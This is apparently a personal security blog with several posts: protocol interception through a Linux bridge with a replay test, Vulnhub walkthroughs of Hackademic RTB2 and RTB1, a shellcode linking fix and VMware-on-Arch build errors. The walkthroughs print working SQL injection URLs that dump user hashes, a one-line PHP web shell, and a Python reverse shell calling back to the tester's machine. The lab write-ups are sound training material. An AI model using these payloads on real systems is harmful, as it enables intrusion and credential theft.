September 19, 2017

Binary protocol inspection

   Sometimes during testing you need to observe traffic between endpoint and server. Also communication protocol can be proprietary, with no TLS wrapping. So to sniff and see what is going on you need to make some changes. In next few lines I will explain how to make a transparent bridge on L2.

   Here is a scheme how to connect yourself and other devices for convenient sniffing:)

endpoint --------> my switch ------------>my laptop -------->server

   So endpoint and my laptop's first adapter are connected to switch. My second adapter is connected to server. To create bridge I use brctl:

brctl addbr vinegrep - create bridge with name vinegrep

brctl addif vinegrep eth0 - add interface eth0 to bridge

brctl addif vinegrep eth1 - add interface eth1 to bridge


Launch wireshark and enjoy observation:)

   Let's make task a bit more difficult. New goal: intercept traffic and try replay attack. The previous part from above is still relevant as a first step. So next, assign IP address to bridge. Then I load br-netfilter kernel module and force that all traffic will be intercepted by iptables:

ebtables -t broute -A BROUTING -p ipv4 -i vinegrep -j DROP

   As a next step I need to create a rule that will forward traffic to my interception proxy. My proxy is listening on port 5555 and server is using tcp port 2608. 

iptables -t nat -A PREROUTING -i vinegrep -p tcp --dport 2608 -j REDIRECT --to 5555

   Now the most interesting part: proxy. There are not many software to choose. I found three options:

  1. NoPE plugin for Burp (https://github.com/summitt/Burp-Non-HTTP-Extension)
  2. binproxy by NCC (https://github.com/nccgroup/BinProxy)
  3. Trudy VM (https://github.com/praetorian-inc/trudy)
I choose NoPE plugin. There is a good video how to use it here - https://www.youtube.com/watch?v=4K0ZhWImtdw. In my case I did not use DNS, just intercepted packet, sent it to repeater and flood server. Primitive replay attack.


May 21, 2017

Hackademic RTB2 Walkthrough

   Today I will write a small review about intermediate level challenge Hackademic RTB2. You can download it from awesome vulnhub - https://download.vulnhub.com/hackademic/Hackademic.RTB2.zip

1. Reconnaissance 


As usual I started with netdiscover:


Next step was to scan ports:


2. Enumeration


In reality I spent a bit of time as port 80 did not reveal anything, port 666 was filtered. I used tool called knock-knock (https://github.com/pan0pt1c0n/knock-knock). After running it I saw port 666 as open. I examined source code of the page and it was shown as Joomla. I enumerated target more using metasploit module for Joomla plugins as it is quite often that plugins are vulnerable.

3. Exploitation

I was right: sectionid was vulnerable to SQL injection. As a next step I entered quote to verify whether it was a true:


As a next step I reviewed Joomla documentation to understand in what table user hashes are stored. I did hands-on SQL Injection exploitation instead of using sqlmap. I revealed field that was suitable for data exfiltration, enumerated tables and etc. I used this request to extract information about users:
http://192.168.57.102:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1%20union%20select%201,concat(username,0x20,password)%20from%20jos_users--

This gave me hashes:


I cracked hashes using Joomla_cracker.pl from https://gist.github.com/cobra-tn/2304218. Cracked hashes did not give me any new footpath. So I decided to utilize another SQLi option - retrieve files. By default Joomla configuration file located in web root. I assumed that /var/www was default path. After I retrieved file I tried "root" username and password to login in phpMyAdmin.


I was able to login. Then I spent some time to create limited shell. I used this video as an example: https://worldhack3r.wordpress.com/2013/05/06/upload-shell-in-phpmyadmin/. To tell long story short: I created database and table in MySQL. Then I used INTO OUTFILE MySQL command to create PHP shell in web root:
SELECT "<? system($REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/cmd.php"


Then I used this shell to create connection back to my machine using python.

192.168.57.102:666/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.57.101%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

4. Privilege escalation

After quick enumeration I tried several kernel exploits. Machine was rooted using "RDS socket" exploit - https://www.exploit-db.com/exploits/15285/. I uploaded exploit code using wget to /tmp, compiled with default gcc and got root.


Conclusions

In general machine was not difficult, there were only few tricky moments to overcome:
1. port knocking - understand that it is in use and find ways to bypass
2. use SQL injection not only to dump hashes but also enumerate files on filesystem
3. shell in phpMyAdmin

May 2, 2017

SLAE compilation problem

   This is a quick note about how I overcame some compilation problems during my SLAE course. Review about the course will be soon. So when I tried to compile shellcode that simple spawn a shell using code that was provided in videos I faced: "Program received signal SIGSEGV, Segmentation fault." I checked everything not once, everything was OK, no stupid typos and stuff like that. So next after some googling I found 2 questions on stackoverflow with similar problem. Problem was that in current systems all .text area are marked read only by default. 

1. First advice was to use -N option while linking: ld -N shellcode.o -o shell (http://stackoverflow.com/questions/13777445/execve-shellcode-writing-segmentation-fault/13777931)
2. Second option is to use gcc with -omagic option: gcc --static -g -Wl,--omagic -o shellc shell.c (http://stackoverflow.com/questions/27581279/make-text-segment-writable-elf)

   Both ways were working as a charm.

March 12, 2017

VMware Workstation + Archlinux = nightmare

Hi all,

This is a quick one. I think lots of active Arch users struggle a lot with every kernel update to run VMware Workstation. Unfortunately awesome vmware-patch from AUR (https://aur.archlinux.org/packages/vmware-patch/) not always helpful.

Here is some advise how to fight against several errors:

1. Error: /usr/lib/vmware/modules/source/vmmon-only/linux/hostif.c:1165:13: error: too many arguments to function ‘get_user_pages’

I saw this after kernel upgrade to 4.7. I used this link (https://communities.vmware.com/thread/536705?tstart=0) with solution to recompile required modules.

2. Errors: /vmmon-only/linux/hostif.c:1592:47: error: ‘NR_ANON_PAGES’ undeclared (first use in this function)
and
/vmnet-only/netif.c:468:7: error: ‘struct net_device’ has no member named ‘trans_start’

These 2 errors you can see after upgrade to 4.8. Here is handy solution with sed:
https://sysadmin.compxtreme.ro/vmware-modules-arch-linux-kernel-4-8-13/

3. Error: /tmp/modconfig-HDxzxN/vmmon-only/linux/hostif.c:1166:13: error: too few arguments to function ‘get_user_pages_remote’

This error you will see after upgrade to 4.9. Here is a thread about this error https://communities.vmware.com/thread/552232 with solution. You can use script from TobInover to fix an issue.

I wish all the best, waiting for new kernel updates:)

Hackademic RTB1

   Here is the time for another walkthrough - Hackademic RTB1.
You can download iso from awesome vulnhub -  https://www.vulnhub.com/entry/hackademic-rtb1,17/

1. As usual we started with netdiscovery:


2. Nmap was the next step:


3. I spent some time on web server and found out that it used outdated wordpress. So next step was to run WPScan.


I tried both SQL Injections from list but no luck. So I went through different parameters to find maybe there were other vulnerabilities. I found out that cat parameter was vulnerable. Instead of using sqlmap I did initial steps myself. I used UNION SELECT to reveal amount of columns:

http://192.168.57.101/Hackademic_RTB1/?cat=1 and sleep(0) UNION SELECT 1,2,3,4,5

I revealed that there were 5 columns and second column had varchar type. The tricky part here is to understand why you need to add sleep(0):)
If you stuck, see a good video from ub3rsec - https://ub3rsec.github.io/pages/2016/hackademic-rtb1.html about manual SQL Injection.

4. Extracted user information from DB using sqlmap:

sqlmap -u 'http://192.168.57.101/Hackademic_RTB1/index.php?cat=1' -T wp_users --dump

Also sqlmap suggested to run dictionary attack against extracted hashes and successfully cracked them all:


5. User GeorgeMiller had admin privileges in wordpress. I used this link to login: http://192.168.57.101/Hackademic_RTB1/wp-admin/.
Next step was to enable file upload functionality in Miscellaneous, allowing PHP files to be uploaded:


6. To obtain shell I used PHP reverse shell from Kali webshells folder. I opened port on my machine and caught connection. Next step was to elevate privileges.
I spawned normal shell using python (python -c 'import pty; pty.spawn("/bin/sh")') and after a bit of enumeration found kernel version:


7. I used exploit suggester for this kernel. You can find this program here - https://github.com/PenturaLabs/Linux_Exploit_Suggester.
The output was:


I tried several exploits before succeeded with rds.
I ran python built-in web server on my machine using: python2 -m SimpleHTTPServer 8080

8. I downloaded and compiled exploit on victim machine:


and got root:


   Thanks to p0wnbox.Team for this challenge.
 
   I think this box has intermediate level of difficulty, however if you do everything using only automated tools it would be much easier.